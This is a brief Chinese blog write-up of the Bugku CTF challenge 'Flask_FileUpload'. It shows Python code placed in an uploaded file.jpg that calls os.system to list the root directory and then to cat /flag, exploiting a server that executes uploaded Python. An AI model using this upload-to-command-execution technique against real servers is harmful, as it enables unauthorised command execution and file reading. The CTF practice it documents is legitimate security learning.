技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
小小测试开发
2 小时前
安装 Python 3.10+
开发语言·人工智能·python
KaMeidebaby
3 小时前
卡梅德生物技术快报|PD1 单克隆抗体定制配套 N 糖全谱质控开发
前端·人工智能·算法·数据挖掘·数据分析
梦想不只是梦与想
3 小时前
Python 中的装饰器
python·装饰器
我叫唧唧波
4 小时前
Python+AI 全栈学习笔记
人工智能·python·学习
nuIl
4 小时前
实现一个 Coding Agent(3):工具调用
前端·agent·cursor
nuIl
4 小时前
实现一个 Coding Agent(4):ReAct 循环
前端·agent·cursor
nuIl
4 小时前
实现一个 Coding Agent(1):一次 LLM 调用
前端·agent·cursor
nuIl
4 小时前
实现一个 Coding Agent(2):让 LLM 流式响应
前端·agent·cursor
copyer_xyf
4 小时前
Python 异常处理
前端·后端·python
sugar__salt
4 小时前
从栈队列数据结构到JS原型面向对象全解
前端·javascript·数据结构
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【AI】2026 年具身智能模型和世界模型总结05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法